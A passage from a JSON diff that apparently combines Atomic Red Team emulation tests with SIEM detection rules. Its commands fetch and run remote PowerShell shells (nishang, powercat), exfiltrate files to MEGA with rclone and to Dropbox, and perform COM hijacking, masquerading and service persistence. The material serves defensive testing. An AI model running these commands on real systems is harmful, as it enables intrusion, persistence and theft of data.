'#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value \"#{dllpath}\"\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", "cleanup_command": "Remove-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Recurse -ErrorAction Ignore", "name": "powershell" } @@ -548768,12 +554481,12 @@ "dependencies": [ { "description": "DLL For testing", - "prereq_command": "if (Test-Path #{dll_path}) {exit 0} else {exit 1}", + "prereq_command": "if (Test-Path \"#{dll_path}\") {exit 0} else {exit 1}", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll\" -OutFile \"#{dll_path}\"\n" } ], "executor": { - "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dll_path}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-localserver #{clsid}'", + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value \"#{dll_path}\"\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-localserver #{clsid}'", "cleanup_command": "Remove-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Recurse -ErrorAction Ignore", "name": "powershell" } @@ -550185,10 +555898,10 @@ "copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y\ncmd.exe /c %APPDATA%\\notepad.exe /B\n", "copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y\ncmd.exe /c %APPDATA%\\svchost.exe /B\n", "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y\ncmd.exe /K %APPDATA%\\taskhostw.exe\n", - "copy \\T1036.003\\bin\\T1036.003.exe ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", - "copy $env:ComSpec ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", + "copy \"\\T1036.003\\bin\\T1036.003.exe\" ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", + "copy \"$env:ComSpec\" ($env:TEMP + \"\\svchost.exe\")\n$myT1036_003 = (Start-Process -PassThru -FilePath ($env:TEMP + \"\\svchost.exe\")).Id\nStop-Process -ID $myT1036_003\n", "copy C:\\Windows\\System32\\cmd.exe C:\\lsm.exe\nC:\\lsm.exe /c echo T1036.003 > C:\\T1036.003.txt\n", - "copy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy C:\\Windows\\System32\\calc.exe %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy \\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy \\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy \\T1036.003\\src\\T1036.003_masquerading.vbs %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy \\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy \\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy \\T1036.003\\src\\T1036.003_masquerading.ps1 %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n" + "copy \"C:\\Windows\\System32\\calc.exe\" %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy \"C:\\Windows\\System32\\calc.exe\" %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy \"C:\\Windows\\System32\\calc.exe\" %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy \"\\T1036.003\\src\\T1036.003_masquerading.vbs\" %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy \"\\T1036.003\\src\\T1036.003_masquerading.vbs\" %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy \"\\T1036.003\\src\\T1036.003_masquerading.vbs\" %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy \"\\T1036.003\\src\\T1036.003_masquerading.ps1\" %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy \"\\T1036.003\\src\\T1036.003_masquerading.ps1\" %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy \"\\T1036.003\\src\\T1036.003_masquerading.ps1\" %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n" ], "commands": [], "queries": [], @@ -550288,12 +556001,12 @@ "dependencies": [ { "description": "Exe file to copy must exist on disk at specified location (#{inputfile})\n", - "prereq_command": "if (Test-Path #{inputfile}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe\" -OutFile \"#{inputfile}\"\n" + "prereq_command": "if (Test-Path \"#{inputfile}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inputfile}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe\" -OutFile \"#{inputfile}\"\n" } ], "executor": { - "command": "copy #{inputfile} #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "command": "copy \"#{inputfile}\" #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", "cleanup_command": "Remove-Item #{outputfile} -Force -ErrorAction Ignore\n", "name": "powershell" } @@ -550318,7 +556031,7 @@ } }, "executor": { - "command": "copy #{inputfile} #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", + "command": "copy \"#{inputfile}\" #{outputfile}\n$myT1036_003 = (Start-Process -PassThru -FilePath #{outputfile}).Id\nStop-Process -ID $myT1036_003\n", "cleanup_command": "Remove-Item #{outputfile} -Force -ErrorAction Ignore\n", "name": "powershell" } @@ -550365,17 +556078,17 @@ "dependencies": [ { "description": "File to copy must exist on disk at specified location (#{vbs_path})\n", - "prereq_command": "if (Test-Path #{vbs_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs\" -OutFile \"#{vbs_path}\"\n" + "prereq_command": "if (Test-Path \"#{vbs_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{vbs_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs\" -OutFile \"#{vbs_path}\"\n" }, { "description": "File to copy must exist on disk at specified location (#{ps1_path})\n", - "prereq_command": "if (Test-Path #{ps1_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1\" -OutFile \"#{ps1_path}\"\n" + "prereq_command": "if (Test-Path \"#{ps1_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{ps1_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1\" -OutFile \"#{ps1_path}\"\n" } ], "executor": { - "command": "copy #{exe_path} %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy #{exe_path} %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy #{vbs_path} %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy #{ps1_path} %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", + "command": "copy \"#{exe_path}\" %temp%\\T1036.003_masquerading.docx.exe /Y\ncopy \"#{exe_path}\" %temp%\\T1036.003_masquerading.pdf.exe /Y\ncopy \"#{exe_path}\" %temp%\\T1036.003_masquerading.ps1.exe /Y\ncopy \"#{vbs_path}\" %temp%\\T1036.003_masquerading.xls.vbs /Y\ncopy \"#{vbs_path}\" %temp%\\T1036.003_masquerading.xlsx.vbs /Y\ncopy \"#{vbs_path}\" %temp%\\T1036.003_masquerading.png.vbs /Y\ncopy \"#{ps1_path}\" %temp%\\T1036.003_masquerading.doc.ps1 /Y\ncopy \"#{ps1_path}\" %temp%\\T1036.003_masquerading.pdf.ps1 /Y\ncopy \"#{ps1_path}\" %temp%\\T1036.003_masquerading.rtf.ps1 /Y\n%temp%\\T1036.003_masquerading.docx.exe\n%temp%\\T1036.003_masquerading.pdf.exe\n%temp%\\T1036.003_masquerading.ps1.exe\n%temp%\\T1036.003_masquerading.xls.vbs\n%temp%\\T1036.003_masquerading.xlsx.vbs\n%temp%\\T1036.003_masquerading.png.vbs\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.doc.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.pdf.ps1\nC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File %temp%\\T1036.003_masquerading.rtf.ps1\n", "cleanup_command": "del /f %temp%\\T1036.003_masquerading.docx.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.pdf.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.ps1.exe > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.xls.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.xlsx.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.png.vbs > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.doc.ps1 > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.pdf.ps1 > nul 2>&1\ndel /f %temp%\\T1036.003_masquerading.rtf.ps1 > nul 2>&1\n", "name": "command_prompt" } @@ -550971,7 +556684,7 @@ { "name": "Suspicious Copy on System32", "description": "This analytic is to detect a suspicious copy of file from systemroot folder of the windows OS. This technique is commonly used by APT or other malware as part of execution (LOLBIN) to run its malicious code using the available legitimate tool in OS. this type of event may seen or may execute of normal user in some instance but this is really a anomaly that needs to be check within the network.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN(\"cmd.exe\", \"powershell*\",\"pwsh.exe\", \"sqlps.exe\", \"sqltoolsps.exe\", \"powershell_ise.exe\") AND `process_copy` AND Processes.process IN(\"*\\\\Windows\\\\System32\\*\", \"*\\\\Windows\\\\SysWow64\\\\*\") AND Processes.process = \"*copy*\" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `suspicious_copy_on_system32_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN(\"cmd.exe\", \"powershell*\",\"pwsh.exe\", \"sqlps.exe\", \"sqltoolsps.exe\", \"powershell_ise.exe\") AND `process_copy` AND Processes.process IN(\"*\\\\Windows\\\\System32\\\\*\", \"*\\\\Windows\\\\SysWow64\\\\*\") AND Processes.process = \"*copy*\" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id temp | `drop_dm_object_name(Processes)` | eval splitted_commandline=split(process,\" \") | eval first_cmdline=lower(mvindex(splitted_commandline,0)) | where NOT LIKE(first_cmdline,\"%\\\\windows\\\\system32\\\\%\") AND NOT LIKE(first_cmdline,\"%\\\\windows\\\\syswow64\\\\%\") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`suspicious_copy_on_system32_filter`", "tags": { "name": "Suspicious Copy on System32", "analytic_story": [ @@ -550989,7 +556702,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "execution of copy exe to copy file from $process$ in $dest$", + "message": "Execution of copy exe to copy file from $process$ in $dest$", "mitre_attack_id": [ "T1036.003", "T1036" @@ -551006,7 +556719,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -551193,7 +556906,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -551376,7 +557089,8 @@ "Unusual Processes", "Ransomware", "Masquerading - Rename System Utilities", - "Qakbot" + "Qakbot", + "Windows Error Reporting Service Elevation of Privilege Vulnerability" ], "asset_type": "Endpoint", "cis20": [ @@ -551462,7 +557176,7 @@ { "name": "Windows DotNet Binary in Non Standard Path", "description": "The following analytic identifies native .net binaries within the Windows operating system that may be abused by adversaries by moving it to a new directory. The analytic identifies the .net binary by using a lookup and compares the process name and original file name (internal name). The analytic utilizes a lookup with the is_net_windows_file macro to identify the binary process name and original file name. if one or the other matches an alert will be generated. Adversaries abuse these binaries as they are native to windows and native DotNet. Note that not all SDK (post install of Windows) are captured in the lookup.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_path Processes.process_id Processes.parent_process_id | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `is_net_windows_file` | `windows_dotnet_binary_in_non_standard_path_filter`", "tags": { "name": "Windows DotNet Binary in Non Standard Path", "analytic_story": [ @@ -551587,7 +557301,7 @@ { "name": "Windows InstallUtil in Non Standard Path", "description": "The following analytic identifies the Windows binary InstallUtil.exe running from a non-standard location. The analytic utilizes a macro for InstallUtil and identifies both the process_name and original_file_name.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_installutil` NOT (Processes.process_path IN (\"*\\\\Windows\\\\ADWS\\\\*\",\"*\\\\Windows\\\\SysWOW64*\", \"*\\\\Windows\\\\system32*\", \"*\\\\Windows\\\\NetworkController\\\\*\", \"*\\\\Windows\\\\SystemApps\\\\*\", \"*\\\\WinSxS\\\\*\", \"*\\\\Windows\\\\Microsoft.NET\\\\*\")) by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.process_hash | `drop_dm_object_name(\"Processes\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_installutil_in_non_standard_path_filter`", "tags": { "name": "Windows InstallUtil in Non Standard Path", "analytic_story": [ @@ -555251,7 +560965,7 @@ } ], "command_list": [ - "New-Item $env:appdata\\rclone -ItemType directory\nNew-Item $env:appdata\\rclone\\rclone.conf\ncd \\..\\ExternalPayloads\\T1567.002\\rclone-v*\\\n.\\rclone.exe config create T1567002 mega\nset-Content $env:appdata\\rclone\\rclone.conf \"[T1567002] `n type = mega `n user = atomictesting@outlook.com `n pass = vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA\"\n.\\rclone.exe copy --max-size 1700k \\..\\ExternalPayloads\\T1567.002 T1567002:test -v\n", + "New-Item $env:appdata\\rclone -ItemType directory\nNew-Item $env:appdata\\rclone\\rclone.conf\ncd \"\\..\\ExternalPayloads\\T1567.002\\rclone-v*\\\"\n.\\rclone.exe config create T1567002 mega\nset-Content $env:appdata\\rclone\\rclone.conf \"[T1567002] `n type = mega `n user = atomictesting@outlook.com `n pass = vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA\"\n.\\rclone.exe copy --max-size 1700k \"\\..\\ExternalPayloads\\T1567.002\" T1567002:test -v\n", "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 'application/octet-stream';\n$req.ContentLength = $file.length;\n$req.TimeOut = 50000;\n$req.KeepAlive = $true;\n$req.Headers.Add(\"Keep-Alive: 300\");\n$reqst = $req.getRequestStream();\n$reqst.write($file, 0, $file.length);\n$reqst.flush();\n$reqst.close();\n\n[net.httpWebResponse] $res = $req.getResponse();\n$resst = $res.getResponseStream();\n$sr = new-object IO.StreamReader($resst);\n$result = $sr.ReadToEnd();\n$result;\n$res.close();\n", "LocalFile='#{host.dir.compress}';\nRemoteName=\"$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)\";\ncurl -X POST https://content.dropboxapi.com/2/files/upload\n --header \"Authorization: Bearer #{dropbox.api.key}\"\n --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"/#{dropbox.target.dir}/$RemoteName\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"\n --header \"Content-Type: application/octet-stream\"\n --data-binary @#{host.dir.compress}\n", "s3upload \"#{host.dir.compress}\" \"#{s3.source.region}\" \"#{s3.source.name}\" \"aws-#{paw}-compressed\" 45s\n", @@ -555311,13 +561025,13 @@ "dependencies": [ { "description": "rclone must exist at (#{rclone_path})\n", - "prereq_command": "if (Test-Path #{rclone_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\rclone.zip\nExpand-archive -path PathToAtomicsFolder\\..\\ExternalPayloads\\rclone.zip -destinationpath PathToAtomicsFolder\\..\\ExternalPayloads\\T1567.002\\ -force\n" + "prereq_command": "if (Test-Path \"#{rclone_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\rclone.zip\"\nExpand-archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\rclone.zip\" -destinationpath \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1567.002\\\" -force\n" } ], "executor": { - "command": "New-Item #{rclone_config_path}\\rclone -ItemType directory\nNew-Item #{rclone_config_path}\\rclone\\rclone.conf\ncd #{rclone_path}\n.\\rclone.exe config create #{remote_share} mega\nset-Content #{rclone_config_path}\\rclone\\rclone.conf \"[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}\"\n.\\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v\n", - "cleanup_command": "cd #{rclone_path}\n.\\rclone.exe purge #{remote_share}:test\n.\\rclone.exe config delete #{remote_share}:\nRemove-Item #{rclone_config_path}\\rclone -recurse -force -erroraction silentlycontinue\ncd c:\\\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\rclone.zip\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\T1567.002 -recurse -force\n", + "command": "New-Item #{rclone_config_path}\\rclone -ItemType directory\nNew-Item #{rclone_config_path}\\rclone\\rclone.conf\ncd \"#{rclone_path}\"\n.\\rclone.exe config create #{remote_share} mega\nset-Content #{rclone_config_path}\\rclone\\rclone.conf \"[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}\"\n.\\rclone.exe copy --max-size 1700k \"#{dir_to_copy}\" #{remote_share}:test -v\n", + "cleanup_command": "cd \"#{rclone_path}\"\n.\\rclone.exe purge #{remote_share}:test\n.\\rclone.exe config delete #{remote_share}:\nRemove-Item #{rclone_config_path}\\rclone -recurse -force -erroraction silentlycontinue\ncd c:\\\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\rclone.zip\"\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\T1567.002\" -recurse -force\n", "name": "powershell", "elevation_required": false } @@ -557397,7 +563111,7 @@ } ], "command_list": [ - "copy \\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\Program Files\\windows_service.exe\"\ncopy \\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n" + "copy \"\\T1574.009\\bin\\WindowsServiceExample.exe\" \"C:\\Program Files\\windows_service.exe\"\ncopy \"\\T1574.009\\bin\\WindowsServiceExample.exe\" \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n" ], "commands": [], "queries": [], @@ -557424,7 +563138,7 @@ } }, "executor": { - "command": "copy #{service_executable} \"C:\\Program Files\\windows_service.exe\"\ncopy #{service_executable} \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n", + "command": "copy \"#{service_executable}\" \"C:\\Program Files\\windows_service.exe\"\ncopy \"#{service_executable}\" \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n", "cleanup_command": "sc stop \"Example Service\" >nul 2>&1\nsc delete \"Example Service\" >nul 2>&1\ndel \"C:\\Program Files\\windows_service.exe\" >nul 2>&1\ndel \"C:\\program.exe\" >nul 2>&1\ndel \"C:\\Time.log\" >nul 2>&1\n", "name": "command_prompt", "elevation_required": true @@ -559668,7 +565382,7 @@ ], "command_list": [ "IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1')\nInvoke-PowerShellIcmp -IPAddress 127.0.0.1\n", - "cmd /c \\..\\ExternalPayloads\\T1095\\nmap-7.80\\ncat.exe 127.0.0.1 80\n", + "cmd /c \"\\..\\ExternalPayloads\\T1095\\nmap-7.80\\ncat.exe\" 127.0.0.1 80\n", "IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1')\npowercat -c 127.0.0.1 -p 80\n" ], "commands": [], @@ -559734,11 +565448,11 @@ { "description": "ncat.exe must be available at specified location (#{ncat_exe})\n", "prereq_command": "if( Test-Path \"#{ncat_exe}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null\n$parentpath = Split-Path (Split-Path \"#{ncat_exe}\"); $zippath = 